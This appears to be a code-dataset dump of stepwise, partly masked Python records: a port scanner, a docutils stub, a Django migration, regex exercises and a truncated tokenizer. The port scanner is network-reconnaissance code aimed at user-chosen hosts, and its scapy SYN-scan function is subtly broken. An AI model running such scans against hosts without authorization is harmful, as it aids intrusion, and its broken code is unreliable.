"step-4": "import threading\nimport socket\nimport subprocess\nimport sys\nimport time\nimport scapy\nfrom threading import Thread, Lock\nfrom queue import Queue\nfrom datetime import datetime\nfrom logging import getLogger, ERROR\ngetLogger('scapy.runtime').setLevel(ERROR)\nfrom scapy.all import *\nsubprocess.call('clear', shell=True)\ntarget = input('Enter a remote host to scan: ')\ntargetIP = socket.gethostbyname(target)\nstartPort = int(input('Enter the start port to scan: '))\nendPort = int(input('Enter the end port to scan: '))\nports = range(int(startPort), int(endPort) + 1)\nt1 = datetime.now()\nSYNACK = 18\nRSTACK = 20\nprint('-' * 60)\nprint('Please wait, scanning remote host...', targetIP)\nlocaltime = time.asctime(time.localtime())\nprint('Scan started at: ', localtime)\n\n\ndef checkhost(ip):\n conf.verb = 0\n try:\n ping = sr1(IP(dst=ip) / ICMP())\n print('\\n[*] Target is up, beginning scan...')\n except Exception:\n print(\"\\n[!] Couldn't resolve target\")\n sys.exit('Exiting...')\n\n\nprint('-' * 60)\n\n\ndef scanport(port):\n startPort = RandShort()\n conf.verb = 0\n SYNACKpkt = sr1(IP(dst=target) / TCP(sport=startPort, endPort=port,\n flags='S'))\n pktflags = SYNACKpkt.getlayer(TCP).flags\n if pktflags == SYNACK:\n return True\n else:\n return False\n RSTpkt = IP(dst=target) / TCP(sport=startPort, endPort=port, flags='R')\n send(RSTpkt)\n\n\ntry:\n for port in range(int(startPort), int(endPort) + 1):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n result = sock.connect_ex((targetIP, port))\n if result == 0:\n print('Port {}: [+] Open'.format(port))\n elif result != 0:\n print('Port {}: [-] Closed'.format(port))\n sock.close()\nexcept KeyboardInterrupt:\n sys.exit('You pressed Ctrl+C')\nexcept socket.gaierror:\n sys.exit('Hostname could not be resolved. Exiting')\nexcept socket.error:\n sys.exit(\"Couldn't connect to server\")\nt2 = datetime.now()\ntotal = t2 - t1\nprint('-' * 60)\nprint('Scanning Completed in: ', total)\n",
"step-5": "# Original code from http://www.pythonforbeginners.com/code-snippets-source-code/port-scanner-in-python\n#!/usr/bin/env python\n\n# modules\nimport threading\nimport socket\nimport subprocess\nimport sys\nimport time\nimport scapy\n\nfrom threading import Thread, Lock\nfrom queue import Queue\nfrom datetime import datetime\nfrom logging import getLogger, ERROR\ngetLogger(\"scapy.runtime\") .setLevel (ERROR)\nfrom scapy.all import *\n\nsubprocess.call('clear', shell=True)\n\n# print_lock = threading.Lock() - WIP, threading not implemented yet.\n\n# Enter target host and port range\ntarget = input(\"Enter a remote host to scan: \")\ntargetIP = socket.gethostbyname(target)\nstartPort = int(input(\"Enter the start port to scan: \"))\nendPort = int(input(\"Enter the end port to scan: \"))\n\n# Setting some values\nports = range(int(startPort), int(endPort)+1)\nt1 = datetime.now()\nSYNACK = 0x12\nRSTACK = 0x14\n\n# Banner displaying which host is being scanned\nprint (\"-\" * 60)\nprint (\"Please wait, scanning remote host...\", targetIP)\nlocaltime = time.asctime(time.localtime())\nprint (\"Scan started at: \", localtime)\ndef checkhost(ip):\n conf.verb = 0\n try:\n ping = sr1(IP(dst = ip)/ICMP())\n print (\"\\n[*] Target is up, beginning scan...\") #this text isn't displayed - why?\n except Exception:\n print (\"\\n[!] 
Couldn't resolve target\")\n sys.exit(\"Exiting...\")\nprint (\"-\" * 60)\n\ndef scanport(port):\n startPort = RandShort() # scapy func that generates a small random nr to use as a source port.\n conf.verb = 0 # prevents output from sending pkts from being printed to the screen.\n SYNACKpkt = sr1(IP(dst = target)/TCP(sport = startPort, endPort = port, flags = \"S\")) # Scapy func sr1() used to craft & send a SYN pkt .\n pktflags = SYNACKpkt.getlayer(TCP).flags\n if pktflags == SYNACK:\n return True\n else:\n return False\n RSTpkt = IP(dst = target)/TCP(sport = startPort, endPort = port, flags = \"R\")\n send(RSTpkt)\n\n\n# Error handling\ntry:\n for port in range(int(startPort), int(endPort)+1):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n result = sock.connect_ex((targetIP, port))\n if result == 0:\n print (\"Port {}: [+] Open\".format(port))\n elif result != 0:\n print (\"Port {}: [-] Closed\".format(port))\n sock.close()\n\nexcept KeyboardInterrupt:\n sys.exit(\"You pressed Ctrl+C\")\n\nexcept socket.gaierror:\n sys.exit(\"Hostname could not be resolved. Exiting\")\n\nexcept socket.error:\n sys.exit(\"Couldn't connect to server\")\n\nt2 = datetime.now()\n\n# Calculates the difference in time, to see how long it took to run the script\ntotal = t2 - t1\nprint (\"-\" * 60)\nprint (\"Scanning Completed in: \", total)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# Stubs for docutils.parsers.rst.directives.tables (Python 3.6)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
import csv
from docutils.statemachine import StringList
from docutils.nodes import Node, system_message, table, title
from docutils.parsers.rst import Directive
from typing import Any, Callable, Dict, List, Tuple, TypeVar
N_co = TypeVar('N_co', bound=Node, covariant=True)
__docformat__: str
def align(argument: str) -> str: ...
class Table(Directive):
optional_arguments: int = ...
final_argument_whitespace: bool = ...
option_spec: Dict[str, Callable[[str], Any]] = ...
has_content: bool = ...
def make_title(self) -> Tuple[title, List[system_message]]: ...
def process_header_option(self) -> Tuple[List[Node], int]: ...
def check_table_dimensions(self, rows: List[List[N_co]], header_rows: int, stub_columns: int) -> None: ...
def set_table_width(self, table_node: table) -> None: ...
@property
def widths(self) -> str: ...
def get_column_widths(self, max_cols: int) -> List[int]: ...
def extend_short_rows_with_empty_cells(self, columns: int, parts: Tuple[List[N_co], List[N_co]]) -> None: ...
class RSTTable(Table):
def run(self) -> List[Node]: ...
class CSVTable(Table):
option_spec: Dict[str, Callable[[str], Any]] = ...
class DocutilsDialect(csv.Dialect):
delimiter: str = ...
quotechar: str = ...
doublequote: bool = ...
skipinitialspace: bool = ...
strict: bool = ...
lineterminator: str = ...
quoting: Any = ...
escapechar: str = ...
def __init__(self, options: Dict[str, Any]) -> None: ...
class HeaderDialect(csv.Dialect):
delimiter: str = ...
quotechar: str = ...
escapechar: str = ...
doublequote: bool = ...
skipinitialspace: bool = ...
strict: bool = ...
lineterminator: str = ...
quoting: Any = ...
def check_requirements(self) -> None: ...
def run(self) -> List[Node]: ...
def get_csv_data(self) -> Tuple[List[str], str]: ...
decode_from_csv: Callable[[str], str] = ...
encode_for_csv: Callable[[str], str] = ...
def parse_csv_data_into_rows(self, csv_data: List[str], dialect: Any, source: str) -> Tuple[List[Tuple[int, int, int, StringList]], int]: ...
class ListTable(Table):
option_spec: Dict[str, Callable[[str], Any]] = ...
def run(self) -> List[Node]: ...
def check_list_content(self, node: Node) -> Tuple[int, List[int]]: ...
def build_table_from_list(self, table_data: List[List[N_co]], col_widths: List[int], header_rows: int, stub_columns: int) -> table: ...
|
normal
|
{
"blob_id": "9abf2b9b90d18332ede94cf1af778e0dda54330b",
"index": 949,
"step-1": "<mask token>\n\n\nclass RSTTable(Table):\n\n def run(self) ->List[Node]:\n ...\n\n\nclass CSVTable(Table):\n option_spec: Dict[str, Callable[[str], Any]] = ...\n\n\n class DocutilsDialect(csv.Dialect):\n delimiter: str = ...\n quotechar: str = ...\n doublequote: bool = ...\n skipinitialspace: bool = ...\n strict: bool = ...\n lineterminator: str = ...\n quoting: Any = ...\n escapechar: str = ...\n\n def __init__(self, options: Dict[str, Any]) ->None:\n ...\n\n\n class HeaderDialect(csv.Dialect):\n delimiter: str = ...\n quotechar: str = ...\n escapechar: str = ...\n doublequote: bool = ...\n skipinitialspace: bool = ...\n strict: bool = ...\n lineterminator: str = ...\n quoting: Any = ...\n\n def check_requirements(self) ->None:\n ...\n\n def run(self) ->List[Node]:\n ...\n\n def get_csv_data(self) ->Tuple[List[str], str]:\n ...\n decode_from_csv: Callable[[str], str] = ...\n encode_for_csv: Callable[[str], str] = ...\n\n def parse_csv_data_into_rows(self, csv_data: List[str], dialect: Any,\n source: str) ->Tuple[List[Tuple[int, int, int, StringList]], int]:\n ...\n\n\nclass ListTable(Table):\n option_spec: Dict[str, Callable[[str], Any]] = ...\n\n def run(self) ->List[Node]:\n ...\n\n def check_list_content(self, node: Node) ->Tuple[int, List[int]]:\n ...\n\n def build_table_from_list(self, table_data: List[List[N_co]],\n col_widths: List[int], header_rows: int, stub_columns: int) ->table:\n ...\n",
"step-2": "<mask token>\n\n\nclass Table(Directive):\n optional_arguments: int = ...\n final_argument_whitespace: bool = ...\n option_spec: Dict[str, Callable[[str], Any]] = ...\n has_content: bool = ...\n\n def make_title(self) ->Tuple[title, List[system_message]]:\n ...\n\n def process_header_option(self) ->Tuple[List[Node], int]:\n ...\n\n def check_table_dimensions(self, rows: List[List[N_co]], header_rows:\n int, stub_columns: int) ->None:\n ...\n\n def set_table_width(self, table_node: table) ->None:\n ...\n\n @property\n def widths(self) ->str:\n ...\n\n def get_column_widths(self, max_cols: int) ->List[int]:\n ...\n\n def extend_short_rows_with_empty_cells(self, columns: int, parts: Tuple\n [List[N_co], List[N_co]]) ->None:\n ...\n\n\nclass RSTTable(Table):\n\n def run(self) ->List[Node]:\n ...\n\n\nclass CSVTable(Table):\n option_spec: Dict[str, Callable[[str], Any]] = ...\n\n\n class DocutilsDialect(csv.Dialect):\n delimiter: str = ...\n quotechar: str = ...\n doublequote: bool = ...\n skipinitialspace: bool = ...\n strict: bool = ...\n lineterminator: str = ...\n quoting: Any = ...\n escapechar: str = ...\n\n def __init__(self, options: Dict[str, Any]) ->None:\n ...\n\n\n class HeaderDialect(csv.Dialect):\n delimiter: str = ...\n quotechar: str = ...\n escapechar: str = ...\n doublequote: bool = ...\n skipinitialspace: bool = ...\n strict: bool = ...\n lineterminator: str = ...\n quoting: Any = ...\n\n def check_requirements(self) ->None:\n ...\n\n def run(self) ->List[Node]:\n ...\n\n def get_csv_data(self) ->Tuple[List[str], str]:\n ...\n decode_from_csv: Callable[[str], str] = ...\n encode_for_csv: Callable[[str], str] = ...\n\n def parse_csv_data_into_rows(self, csv_data: List[str], dialect: Any,\n source: str) ->Tuple[List[Tuple[int, int, int, StringList]], int]:\n ...\n\n\nclass ListTable(Table):\n option_spec: Dict[str, Callable[[str], Any]] = ...\n\n def run(self) ->List[Node]:\n ...\n\n def check_list_content(self, node: Node) ->Tuple[int, 
List[int]]:\n ...\n\n def build_table_from_list(self, table_data: List[List[N_co]],\n col_widths: List[int], header_rows: int, stub_columns: int) ->table:\n ...\n",
"step-3": "<mask token>\n\n\ndef align(argument: str) ->str:\n ...\n\n\nclass Table(Directive):\n optional_arguments: int = ...\n final_argument_whitespace: bool = ...\n option_spec: Dict[str, Callable[[str], Any]] = ...\n has_content: bool = ...\n\n def make_title(self) ->Tuple[title, List[system_message]]:\n ...\n\n def process_header_option(self) ->Tuple[List[Node], int]:\n ...\n\n def check_table_dimensions(self, rows: List[List[N_co]], header_rows:\n int, stub_columns: int) ->None:\n ...\n\n def set_table_width(self, table_node: table) ->None:\n ...\n\n @property\n def widths(self) ->str:\n ...\n\n def get_column_widths(self, max_cols: int) ->List[int]:\n ...\n\n def extend_short_rows_with_empty_cells(self, columns: int, parts: Tuple\n [List[N_co], List[N_co]]) ->None:\n ...\n\n\nclass RSTTable(Table):\n\n def run(self) ->List[Node]:\n ...\n\n\nclass CSVTable(Table):\n option_spec: Dict[str, Callable[[str], Any]] = ...\n\n\n class DocutilsDialect(csv.Dialect):\n delimiter: str = ...\n quotechar: str = ...\n doublequote: bool = ...\n skipinitialspace: bool = ...\n strict: bool = ...\n lineterminator: str = ...\n quoting: Any = ...\n escapechar: str = ...\n\n def __init__(self, options: Dict[str, Any]) ->None:\n ...\n\n\n class HeaderDialect(csv.Dialect):\n delimiter: str = ...\n quotechar: str = ...\n escapechar: str = ...\n doublequote: bool = ...\n skipinitialspace: bool = ...\n strict: bool = ...\n lineterminator: str = ...\n quoting: Any = ...\n\n def check_requirements(self) ->None:\n ...\n\n def run(self) ->List[Node]:\n ...\n\n def get_csv_data(self) ->Tuple[List[str], str]:\n ...\n decode_from_csv: Callable[[str], str] = ...\n encode_for_csv: Callable[[str], str] = ...\n\n def parse_csv_data_into_rows(self, csv_data: List[str], dialect: Any,\n source: str) ->Tuple[List[Tuple[int, int, int, StringList]], int]:\n ...\n\n\nclass ListTable(Table):\n option_spec: Dict[str, Callable[[str], Any]] = ...\n\n def run(self) ->List[Node]:\n ...\n\n def 
check_list_content(self, node: Node) ->Tuple[int, List[int]]:\n ...\n\n def build_table_from_list(self, table_data: List[List[N_co]],\n col_widths: List[int], header_rows: int, stub_columns: int) ->table:\n ...\n",
"step-4": "<mask token>\nN_co = TypeVar('N_co', bound=Node, covariant=True)\n__docformat__: str\n\n\ndef align(argument: str) ->str:\n ...\n\n\nclass Table(Directive):\n optional_arguments: int = ...\n final_argument_whitespace: bool = ...\n option_spec: Dict[str, Callable[[str], Any]] = ...\n has_content: bool = ...\n\n def make_title(self) ->Tuple[title, List[system_message]]:\n ...\n\n def process_header_option(self) ->Tuple[List[Node], int]:\n ...\n\n def check_table_dimensions(self, rows: List[List[N_co]], header_rows:\n int, stub_columns: int) ->None:\n ...\n\n def set_table_width(self, table_node: table) ->None:\n ...\n\n @property\n def widths(self) ->str:\n ...\n\n def get_column_widths(self, max_cols: int) ->List[int]:\n ...\n\n def extend_short_rows_with_empty_cells(self, columns: int, parts: Tuple\n [List[N_co], List[N_co]]) ->None:\n ...\n\n\nclass RSTTable(Table):\n\n def run(self) ->List[Node]:\n ...\n\n\nclass CSVTable(Table):\n option_spec: Dict[str, Callable[[str], Any]] = ...\n\n\n class DocutilsDialect(csv.Dialect):\n delimiter: str = ...\n quotechar: str = ...\n doublequote: bool = ...\n skipinitialspace: bool = ...\n strict: bool = ...\n lineterminator: str = ...\n quoting: Any = ...\n escapechar: str = ...\n\n def __init__(self, options: Dict[str, Any]) ->None:\n ...\n\n\n class HeaderDialect(csv.Dialect):\n delimiter: str = ...\n quotechar: str = ...\n escapechar: str = ...\n doublequote: bool = ...\n skipinitialspace: bool = ...\n strict: bool = ...\n lineterminator: str = ...\n quoting: Any = ...\n\n def check_requirements(self) ->None:\n ...\n\n def run(self) ->List[Node]:\n ...\n\n def get_csv_data(self) ->Tuple[List[str], str]:\n ...\n decode_from_csv: Callable[[str], str] = ...\n encode_for_csv: Callable[[str], str] = ...\n\n def parse_csv_data_into_rows(self, csv_data: List[str], dialect: Any,\n source: str) ->Tuple[List[Tuple[int, int, int, StringList]], int]:\n ...\n\n\nclass ListTable(Table):\n option_spec: Dict[str, 
Callable[[str], Any]] = ...\n\n def run(self) ->List[Node]:\n ...\n\n def check_list_content(self, node: Node) ->Tuple[int, List[int]]:\n ...\n\n def build_table_from_list(self, table_data: List[List[N_co]],\n col_widths: List[int], header_rows: int, stub_columns: int) ->table:\n ...\n",
"step-5": "# Stubs for docutils.parsers.rst.directives.tables (Python 3.6)\n#\n# NOTE: This dynamically typed stub was automatically generated by stubgen.\n\nimport csv\nfrom docutils.statemachine import StringList\nfrom docutils.nodes import Node, system_message, table, title\nfrom docutils.parsers.rst import Directive\nfrom typing import Any, Callable, Dict, List, Tuple, TypeVar\n\nN_co = TypeVar('N_co', bound=Node, covariant=True)\n\n__docformat__: str\n\ndef align(argument: str) -> str: ...\n\nclass Table(Directive):\n optional_arguments: int = ...\n final_argument_whitespace: bool = ...\n option_spec: Dict[str, Callable[[str], Any]] = ...\n has_content: bool = ...\n def make_title(self) -> Tuple[title, List[system_message]]: ...\n def process_header_option(self) -> Tuple[List[Node], int]: ...\n def check_table_dimensions(self, rows: List[List[N_co]], header_rows: int, stub_columns: int) -> None: ...\n def set_table_width(self, table_node: table) -> None: ...\n @property\n def widths(self) -> str: ...\n def get_column_widths(self, max_cols: int) -> List[int]: ...\n def extend_short_rows_with_empty_cells(self, columns: int, parts: Tuple[List[N_co], List[N_co]]) -> None: ...\n\nclass RSTTable(Table):\n def run(self) -> List[Node]: ...\n\nclass CSVTable(Table):\n option_spec: Dict[str, Callable[[str], Any]] = ...\n class DocutilsDialect(csv.Dialect):\n delimiter: str = ...\n quotechar: str = ...\n doublequote: bool = ...\n skipinitialspace: bool = ...\n strict: bool = ...\n lineterminator: str = ...\n quoting: Any = ...\n escapechar: str = ...\n def __init__(self, options: Dict[str, Any]) -> None: ...\n class HeaderDialect(csv.Dialect):\n delimiter: str = ...\n quotechar: str = ...\n escapechar: str = ...\n doublequote: bool = ...\n skipinitialspace: bool = ...\n strict: bool = ...\n lineterminator: str = ...\n quoting: Any = ...\n def check_requirements(self) -> None: ...\n def run(self) -> List[Node]: ...\n def get_csv_data(self) -> Tuple[List[str], str]: ...\n 
decode_from_csv: Callable[[str], str] = ...\n encode_for_csv: Callable[[str], str] = ...\n def parse_csv_data_into_rows(self, csv_data: List[str], dialect: Any, source: str) -> Tuple[List[Tuple[int, int, int, StringList]], int]: ...\n\nclass ListTable(Table):\n option_spec: Dict[str, Callable[[str], Any]] = ...\n def run(self) -> List[Node]: ...\n def check_list_content(self, node: Node) -> Tuple[int, List[int]]: ...\n def build_table_from_list(self, table_data: List[List[N_co]], col_widths: List[int], header_rows: int, stub_columns: int) -> table: ...\n",
"step-ids": [
11,
19,
20,
22,
24
]
}
|
[
11,
19,
20,
22,
24
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('books', '0007_auto_20170127_2254')]
operations = [migrations.AlterField(model_name='book', name='subtitle',
field=models.CharField(blank=True, help_text=
'e.g. There and Back Again', max_length=200)), migrations.
AlterField(model_name='book', name='title', field=models.CharField(
db_index=True, help_text='e.g. The Hobbit', max_length=200, unique=
True))]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('books', '0007_auto_20170127_2254')]
operations = [migrations.AlterField(model_name='book', name='subtitle',
field=models.CharField(blank=True, help_text=
'e.g. There and Back Again', max_length=200)), migrations.
AlterField(model_name='book', name='title', field=models.CharField(
db_index=True, help_text='e.g. The Hobbit', max_length=200, unique=
True))]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-01-30 14:50
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('books', '0007_auto_20170127_2254'),
]
operations = [
migrations.AlterField(
model_name='book',
name='subtitle',
field=models.CharField(blank=True, help_text='e.g. There and Back Again', max_length=200),
),
migrations.AlterField(
model_name='book',
name='title',
field=models.CharField(db_index=True, help_text='e.g. The Hobbit', max_length=200, unique=True),
),
]
|
flexible
|
{
"blob_id": "65ea27851d9db0f0a06d42bd37eff633d22a1548",
"index": 9528,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('books', '0007_auto_20170127_2254')]\n operations = [migrations.AlterField(model_name='book', name='subtitle',\n field=models.CharField(blank=True, help_text=\n 'e.g. There and Back Again', max_length=200)), migrations.\n AlterField(model_name='book', name='title', field=models.CharField(\n db_index=True, help_text='e.g. The Hobbit', max_length=200, unique=\n True))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('books', '0007_auto_20170127_2254')]\n operations = [migrations.AlterField(model_name='book', name='subtitle',\n field=models.CharField(blank=True, help_text=\n 'e.g. There and Back Again', max_length=200)), migrations.\n AlterField(model_name='book', name='title', field=models.CharField(\n db_index=True, help_text='e.g. The Hobbit', max_length=200, unique=\n True))]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.10.5 on 2017-01-30 14:50\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('books', '0007_auto_20170127_2254'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='book',\n name='subtitle',\n field=models.CharField(blank=True, help_text='e.g. There and Back Again', max_length=200),\n ),\n migrations.AlterField(\n model_name='book',\n name='title',\n field=models.CharField(db_index=True, help_text='e.g. The Hobbit', max_length=200, unique=True),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
###############################################################
## File Name: 11_exercise.py
## File Type: Python File
## Author: surge55
## Course: Python 4 Everybody
## Chapter: Chapter 11 - Regular Expressions
## Excercise: n/a
## Description: Code walkthrough from book
## Other References: associated files in folder
###############################################################
#11.2 Extracting data using regular expressions
# import re
# s = 'A message from csev@umich.edu to cwen@iupui.edu about meeting @2PM'
# lst = re.findall('\S+@\S+', s)
# print(lst)
# We can use this regular expression in a program
# to read all the lines in a file and print out
# anything that looks like an email address:
# import re
# hand = open('mbox-short.txt')
# for line in hand:
# line = line.rstrip()
# x = re.findall('\S+@\S+', line)
# if len(x) > 0:
# print(x)
## Much Cleaner Version
# import re
# hand = open('mbox-short.txt')
# for line in hand:
# line = line.rstrip()
# x = re.findall('[a-zA-Z0-9]\S*@\S*[a-zA-Z]', line)
# if len(x) > 0:
# print(x)
# Search for lines that start with "X" followed by any
# non-whitespace characters and ':'
# followed by a space and any number
# the number can include a decimal
# import re
# hand = open('mbox-short.txt')
# # Returns a List
# # for line in hand:
# # line = line.rstrip()
# # x = re.findall('^X\S*: [0-9.]+', line)
# # if len(x) > 0:
# # print(x)
# # print(type(line))
# # Returnes a String
# for line in hand:
# line = line.rstrip()
# if re.search('^X\S*: [0-9.]+', line):
# print(line)
# # print(type(line))
# Search for lines that start with 'X' followed by any
# non whitespace characters and ':' followed by a space
# and any number. The number can include a decimal
# Then print the number if it is greater than 0
# import re
# hand = open('mbox-short.txt')
# for line in hand:
# line = line.rstrip()
# x = re.findall('^X\S*: ([0-9.]+)', line)
# if len(x) > 0:
# print(x)
# Exercise 1
# Write a simple program to simulate the operation of the grep
# command on unix. Ask the user to enter a regular expression
# and count the nuber of lines that matched the regular expression:
# import re
# reg_inp = input("Enter a regular expression: ")
# count = 0
# hand = open('mbox.txt')
# for line in hand:
# line = line.rstrip()
# if re.search(reg_inp, line):
# count += 1
# print('mbox.txt had', count, 'lines that match', reg_inp)
# Exercise 2
# Write a program to look for lines of the form:
# 'New Revision: 39772'
# Extract the number from each of the lines using a regular expression
# and the findall() method. Compute the average of the numbers
# and print out the average as an integer.
# import re
# hand = open('mbox.txt')
# total = 0
# count = 0
# for line in hand:
# line = line.rstrip()
# x = re.findall('^New Revision: ([0-9]+)', line)
# if len(x) > 0:
# for i in x:
# total = total + float(i)
# count += 1
# print(int(total/count))
# FINDING NUMBERS IN A HAYSTACK
# In this assignment you will read through and parse a file with text and numbers
# You will extract all the numbers in the file and compute the sum
# of the numbers
import re
hand = open('regex_sum_act.txt')
total = 0
count = 0
for line in hand:
line = line.rstrip()
x = re.findall('([0-9]+)', line)
if len(x) > 0:
# print(x)
for i in x:
total += float(i)
print('sum is', int(total))
|
normal
|
{
"blob_id": "860908126d473e6c4ed070992a1b518683fd4c27",
"index": 3275,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor line in hand:\n line = line.rstrip()\n x = re.findall('([0-9]+)', line)\n if len(x) > 0:\n for i in x:\n total += float(i)\nprint('sum is', int(total))\n",
"step-3": "<mask token>\nhand = open('regex_sum_act.txt')\ntotal = 0\ncount = 0\nfor line in hand:\n line = line.rstrip()\n x = re.findall('([0-9]+)', line)\n if len(x) > 0:\n for i in x:\n total += float(i)\nprint('sum is', int(total))\n",
"step-4": "import re\nhand = open('regex_sum_act.txt')\ntotal = 0\ncount = 0\nfor line in hand:\n line = line.rstrip()\n x = re.findall('([0-9]+)', line)\n if len(x) > 0:\n for i in x:\n total += float(i)\nprint('sum is', int(total))\n",
"step-5": "###############################################################\r\n## File Name: 11_exercise.py\r\n## File Type: Python File\r\n## Author: surge55\r\n## Course: Python 4 Everybody\r\n## Chapter: Chapter 11 - Regular Expressions\r\n## Excercise: n/a\r\n## Description: Code walkthrough from book \r\n## Other References: associated files in folder\r\n###############################################################\r\n\r\n\r\n#11.2 Extracting data using regular expressions\r\n\r\n# import re\r\n# s = 'A message from csev@umich.edu to cwen@iupui.edu about meeting @2PM'\r\n# lst = re.findall('\\S+@\\S+', s)\r\n# print(lst) \r\n\r\n# We can use this regular expression in a program\r\n# to read all the lines in a file and print out\r\n# anything that looks like an email address:\r\n# import re\r\n# hand = open('mbox-short.txt')\r\n# for line in hand:\r\n# line = line.rstrip()\r\n# x = re.findall('\\S+@\\S+', line)\r\n# if len(x) > 0:\r\n# print(x)\r\n\r\n## Much Cleaner Version\r\n# import re\r\n# hand = open('mbox-short.txt')\r\n# for line in hand:\r\n# line = line.rstrip()\r\n# x = re.findall('[a-zA-Z0-9]\\S*@\\S*[a-zA-Z]', line)\r\n# if len(x) > 0:\r\n# print(x)\r\n\r\n# Search for lines that start with \"X\" followed by any\r\n# non-whitespace characters and ':'\r\n# followed by a space and any number\r\n# the number can include a decimal\r\n# import re\r\n# hand = open('mbox-short.txt')\r\n\r\n# # Returns a List\r\n# # for line in hand:\r\n# # line = line.rstrip()\r\n# # x = re.findall('^X\\S*: [0-9.]+', line)\r\n# # if len(x) > 0:\r\n# # print(x)\r\n# # print(type(line))\r\n\r\n# # Returnes a String\r\n# for line in hand:\r\n# line = line.rstrip()\r\n# if re.search('^X\\S*: [0-9.]+', line):\r\n# print(line)\r\n# # print(type(line))\r\n\r\n\r\n\r\n# Search for lines that start with 'X' followed by any\r\n# non whitespace characters and ':' followed by a space\r\n# and any number. 
The number can include a decimal\r\n# Then print the number if it is greater than 0\r\n\r\n# import re\r\n# hand = open('mbox-short.txt')\r\n\r\n# for line in hand:\r\n# line = line.rstrip()\r\n# x = re.findall('^X\\S*: ([0-9.]+)', line)\r\n# if len(x) > 0:\r\n# print(x)\r\n\r\n\r\n# Exercise 1\r\n# Write a simple program to simulate the operation of the grep\r\n# command on unix. Ask the user to enter a regular expression \r\n# and count the nuber of lines that matched the regular expression:\r\n\r\n# import re\r\n\r\n# reg_inp = input(\"Enter a regular expression: \")\r\n# count = 0\r\n\r\n# hand = open('mbox.txt')\r\n# for line in hand:\r\n# line = line.rstrip()\r\n# if re.search(reg_inp, line):\r\n# count += 1\r\n\r\n# print('mbox.txt had', count, 'lines that match', reg_inp)\r\n\r\n\r\n\r\n# Exercise 2\r\n# Write a program to look for lines of the form:\r\n# 'New Revision: 39772'\r\n# Extract the number from each of the lines using a regular expression\r\n# and the findall() method. Compute the average of the numbers\r\n# and print out the average as an integer.\r\n\r\n# import re\r\n# hand = open('mbox.txt')\r\n# total = 0\r\n# count = 0\r\n\r\n# for line in hand:\r\n# line = line.rstrip()\r\n# x = re.findall('^New Revision: ([0-9]+)', line)\r\n# if len(x) > 0:\r\n# for i in x:\r\n# total = total + float(i)\r\n# count += 1\r\n\r\n# print(int(total/count))\r\n\r\n\r\n# FINDING NUMBERS IN A HAYSTACK\r\n# In this assignment you will read through and parse a file with text and numbers\r\n# You will extract all the numbers in the file and compute the sum\r\n# of the numbers \r\n\r\nimport re\r\nhand = open('regex_sum_act.txt')\r\ntotal = 0\r\ncount = 0\r\n\r\nfor line in hand:\r\n line = line.rstrip()\r\n x = re.findall('([0-9]+)', line)\r\n if len(x) > 0:\r\n # print(x)\r\n for i in x:\r\n total += float(i)\r\n\r\nprint('sum is', int(total))\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import re
f = open('q4text.txt')
text = f.read()
f.close()
pattern = r'''[0-9]+[,][0-9]+|[0-9]+[.][0-9]+|[0-9]+|\b[A-Z][a-z]+[.]|\b[A-Za-z]+['][a-z]+|[A-Z.]+[A-Z]|\b[A-Za-z-]+|[.]+|[.,'"!?:;]'''
word_token = re.findall(pattern, text)
token_dictionary = {}
for element in word_token:
if element in token_dictionary:
token_dictionary[element] += 1
else:
token_dictionary[element] = 1
for key in sorted(token_dictionary.keys()):
print("{} {}".format(key, token_dictionary[key]))
print('Tokens: ' + str(len(word_token)))
print('Types: ' + str(len(token_dictionary)))
|
normal
|
{
"blob_id": "2e27302abbe239c1a6067a9eb52f5a857fff7dd2",
"index": 1736,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nf.close()\n<mask token>\nfor element in word_token:\n if element in token_dictionary:\n token_dictionary[element] += 1\n else:\n token_dictionary[element] = 1\nfor key in sorted(token_dictionary.keys()):\n print('{} {}'.format(key, token_dictionary[key]))\nprint('Tokens: ' + str(len(word_token)))\nprint('Types: ' + str(len(token_dictionary)))\n",
"step-3": "<mask token>\nf = open('q4text.txt')\ntext = f.read()\nf.close()\npattern = (\n '[0-9]+[,][0-9]+|[0-9]+[.][0-9]+|[0-9]+|\\\\b[A-Z][a-z]+[.]|\\\\b[A-Za-z]+[\\'][a-z]+|[A-Z.]+[A-Z]|\\\\b[A-Za-z-]+|[.]+|[.,\\'\"!?:;]'\n )\nword_token = re.findall(pattern, text)\ntoken_dictionary = {}\nfor element in word_token:\n if element in token_dictionary:\n token_dictionary[element] += 1\n else:\n token_dictionary[element] = 1\nfor key in sorted(token_dictionary.keys()):\n print('{} {}'.format(key, token_dictionary[key]))\nprint('Tokens: ' + str(len(word_token)))\nprint('Types: ' + str(len(token_dictionary)))\n",
